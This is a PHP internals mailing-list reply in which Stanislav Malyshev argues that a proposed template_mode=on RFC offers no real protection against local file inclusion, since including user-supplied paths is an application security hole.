Hi! > template_mode=on is not a actual security measure, but a > switch for language mode. template_mode=on has side > effect that makes PHP as safe as other scripting languages > or even better!
PHP is as safe as other scripting languages right now. And you are using security talk to promote this proposal, including in this very email. If you don't see it as security feature, please do not talk about it as a security feature. > Therefore, it should not be misunderstood as perfect LFI > countermeasure even if I stressed on security meanings. > I'm stressing security because this actually helps PHP being > much safer than now. I don't see how it is "much safer". Exactly the same problem exists. Not only it is not "perfect" countermeasure, it's not countermeasure at all, judging from your description. It's like saying "I have SQL injection protection, but only if word "please" is not part of the SQL injection". It's not a real protection then. > PHP could be stronger against LFI compare to scripting languages > as I described in previous mail. PHP is as strong as any other language right now - if you include user-supplied code, you lost, don't do it - no problem. > With this RFC, infamous reputation of LFI can be removed from PHP! I see no "infamous reputation" except the wrong one you are creating right now. include with user-supplied argument is a security hole, it has nothing to do with vulnerability in PHP. -- Stanislav Malyshev, Software Architect SugarCRM: http://www.sugarcrm.com/ (408)454-6900 ext. 227 -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
